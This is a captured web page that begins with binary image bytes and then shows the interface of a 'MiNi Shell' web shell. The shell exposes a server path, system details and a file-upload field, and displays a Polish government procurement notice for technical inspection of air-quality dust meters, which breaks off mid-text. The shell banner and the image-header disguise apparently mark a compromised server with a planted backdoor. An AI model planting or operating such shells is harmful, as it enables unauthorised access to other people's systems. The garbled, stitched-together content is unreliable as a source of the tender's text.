JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230601/0024399901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przegląd techniczny w KSMP w podziale na<br/>zadania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Inspektorat Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000861593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bitwy Warszawskiej 1920 roku nr 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.winnicki@gios.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gios.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przegląd techniczny w KSMP w podziale na<br/>zadania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0574f37-008b-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00243999</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00121050/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przegląd techniczny w KSMP w podziale na zadania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-gios.ezamawiajacy.pl. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy<br/>zakupowej zamawiającego pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie<br/>z Rozporządzeniem Prezesa Rady Ministrów z dnia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. poz. 2452)<br/>Ze względu na ograniczenia techniczne pozostała treść w SWZ, Rozdział XIII.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumentacja niniejszego postępowania została opublikowana na platformie zakupowej.<br/>W celu zapoznania się z dokumentacją postępowania Wykonawca po przejściu na<br/>dedykowany adres platformy zakupowej:<br/>- do upływu terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Aktualne” i wyszukuje przedmiotowe postępowanie,<br/>- po upływie terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Archiwalne” i wyszukuje przedmiotowe<br/>postępowanie.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego<br/>tj. bezpłatnie rejestrując się lub, w przypadku posiadania konta w platformie zakupowej,<br/>logując się, akceptuje regulamin zamieszczony na stronie internetowej:<br/>https://oneplace.marketplanet.pl/regulamin oraz warunki korzystania z platformy<br/>zakupowej wynikające z Instrukcji korzystania z platformy zakupowej Wykonawcy<br/>(Instrukcja użytkownika). Instrukcja dostępna jest pod adresem:<br/>https://zamowieniagios.<br/>ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;<br/>clientName=zamowienia-gios&amp;USER_MENU_HOVER=publicFilesList<br/>W celu wejścia na platformę zakupową umożliwiającą m.in. zapoznanie się z treścią<br/>SWZ, złożenie oferty, wymagane jest uprzednie zalogowanie. Wykonawcy, którzy nie<br/>założyli konta, zobligowani są do uprzedniej, bezpłatnej rejestracji. Szczegóły<br/>rejestracji wskazane są w Instrukcji korzystania z platformy zakupowej. Proces rejestracji<br/>trwa maksymalnie do 2 dni roboczych. Zamawiający zaleca więc Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej.<br/>Ważne – oferta zapisana na platformie zakupowej nie oznacza, że została ona<br/>złożona. Zapisanie oferty daje użytkownikowi czas, na wprowadzenie<br/>ewentualnych poprawek, uzupełnień, dołączenie dodatkowych załączników.<br/>Dopiero wybór ikony ZŁÓŻ OFERTĘ/WNIOSEK oznacza złożenie oferty/wniosku<br/>zgodnie z przepisami ustawy Pzp.<br/>5. W prowadzonym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia<br/>oraz informacje Zamawiający i Wykonawcy przekazują za pomocą platformy<br/>zakupowej pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ<br/>za pośrednictwem platformy zakupowej. Treść zapytań wraz z wyjaśnieniami treści SWZ<br/>będzie zamieszczana na stronie internetowej Zamawiającego za pośrednictwem<br/>platformy zakupowej pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>7. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego,<br/>uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do<br/>Zamawiającego przed upływem tego terminu (wczytanie na platformie zakupowej).<br/>8. Za datę wpływu oferty, oświadczeń wniosków, zawiadomień oraz informacji<br/>przekazywanych przez Wykonawcę i Zamawiającego przyjmuje się datę i godzinę<br/>wczytania na platformie zakupowej.<br/>9. Jeśli w niniejszej Specyfikacji Warunków Zamówienia jest mowa o opatrzeniu /<br/>podpisaniu dokumentu / oświadczenia kwalifikowanym podpisem elektronicznym,<br/>Zamawiający wymaga, aby kwalifikowany podpis elektroniczny wystawiony był przez<br/>dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi<br/>certyfikowane – podpis elektroniczny, spełniające wymogi bezpieczeństwa określone<br/>w ustawie z dnia 5 września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej<br/>(Dz.U. z 2020 r. poz. 1173 – t.j.). Szczegółowe informacje o sposobie pozyskania usługi<br/>kwalifikowanego podpisu elektronicznego oraz warunkach jej użycia można znaleźć na<br/>stronach internetowych kwalifikowanych dostawców usług zaufania, których lista<br/>znajduje się pod adresem internetowym http://www.nccert.pl.<br/><br/>Ze względu na ograniczenia techniczne pozostała treść w SWZ, Rozdział XIII.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zamowienia-gios.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Główny Inspektorat Ochrony<br/>Środowiska,<br/>2) adres email inspektora ochrony danych osobowych: iod@gios.gov.pl.<br/>3) Pani/Pana dane osobowe (w tym wszelkie dane osobowe osób zgłoszonych<br/>w ofercie oraz w trakcie realizacji umowy) przetwarzane będą na podstawie art. 6 ust. 1<br/>lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia<br/>publicznego oraz jego realizacją w tym oraz podczas realizacji umowy zawartej w wyniku<br/>przeprowadzonego postępowania,<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz.<br/>2019 ze zm.) oraz osoby lub podmioty współpracujące lub wykonujące działania<br/>nadzorcze w związku z realizacją umowy o udzielenie zamówienia publicznego,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu<br/>oraz jego załączników,<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>członkowskiego;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO.<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że: udostępnia dane<br/>osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków<br/>skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków<br/>ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich<br/>wniesienie; udostępnianie protokołu i załączników do protokołu ma zastosowanie do<br/>wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO<br/>(tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy<br/>polityczne, przekonania religijne lub światopoglądowe, przynależność do związków<br/>zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu<br/>jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia,<br/>seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o<br/>udzielenie zamówienia; w przypadku korzystania przez osobę, której dane osobowe są<br/>przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3<br/>RODO (związanych z prawem Wykonawcy do uzyskania od administratora<br/>potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy<br/>do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46<br/>RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od<br/>administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający<br/>może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia; skorzystanie przez osobę, której dane osobowe są<br/>przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do<br/>sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności<br/>protokołu postępowania oraz jego załączników; w postępowaniu o udzielenie<br/>zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18<br/>ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania; w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym<br/>mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia<br/>zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych<br/>danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia<br/>2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DP-WZP.26.1.34.2023.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 372515,20 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przegląd techniczny 48 sztuk pyłomierzy<br/>automatycznych Grimm </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 201600,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90731000-0 - Usługi związane z zanieczyszczeniem powietrza</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Punkty przyznane za kryterium „Cena ” liczone będą wg następującego wzoru:<br/>C = (CN : CB) × 100 x waga (60% tj. 0,60) = XX.XX liczba punktów.<br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 60 pkt.<br/>b) Punkty przyznane za kryterium „Gwarancja” liczone będą wg następującego wzoru:<br/>Dodatkowa gwarancja na wykonaną usługę uwzględniającą wymienione części<br/>zużywalne liczona od podpisania protokołu odbioru otrzyma odpowiednio:<br/>Wykonawca, który zaoferuje minimalny wymagany przez zamawiającego okres gwarancji równy 24 m-ce (obligatoryjnie, minimalne) – otrzyma 0 pkt;<br/>Wykonawca, który zaoferuje okres gwarancji wynoszący:<br/>30 miesięcy - 5 pkt<br/>36 miesięcy - 10 pkt<br/>40 miesięcy – 15 pkt<br/>48 miesięcy – 20 pkt<br/>Za wskazanie okresu gwarancji poniżej progu w miesiącach Zamawiający będzie<br/>przyznawał punktu dla progu niższe.<br/>Np. Wykonawca zaoferuje 39 miesięcy – otrzymuje punkty za 36 miesięcy.<br/>Analogicznie w pozostałym zakresie.<br/>UWAGA! Kryterium dotyczy całego zadania (części), a nie elementów składowych w<br/>zestawie.<br/>c) Punkty przyznane za kryterium „Czas realizacji usługi” liczone będą wg<br/>następującego wzoru:<br/>Czas wykonania zadania, który decyduje o długości oddelegowania<br/>pracowników CLB i ich powrocie do wykonywania zadań wynikających z<br/>codziennych obowiązków odpowiednio:<br/>do 3 miesięcy od podpisania umowy (obligatoryjnie) – 0 pkt<br/>do 2 miesięcy od podpisania umowy – 20 pkt<br/>d) Ocenę końcową badanej oferty stanowić będzie suma punktów kryteriów: Cena,<br/>Gwarancja, Czas realizacji usługi - maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przegląd techniczny 37 sztuk pyłomierzy automatycznych Fidas – Palas </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 150590,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90731000-0 - Usługi związane z zanieczyszczeniem powietrza</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Punkty przyznane za kryterium „Cena ” liczone będą wg następującego wzoru:<br/>C = (CN : CB) × 100 x waga (60% tj. 0,60) = XX.XX liczba punktów.<br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 60 pkt.<br/>b) Punkty przyznane za kryterium „Gwarancja” liczone będą wg następującego wzoru:<br/>Dodatkowa gwarancja na wykonaną usługę uwzględniającą wymienione części<br/>zużywalne liczona od podpisania protokołu odbioru otrzyma odpowiednio:<br/>Wykonawca, który zaoferuje minimalny wymagany przez zamawiającego okres gwarancji równy 24 m-ce (obligatoryjnie, minimalne) – otrzyma 0 pkt;<br/>Wykonawca, który zaoferuje okres gwarancji wynoszący:<br/>30 miesięcy - 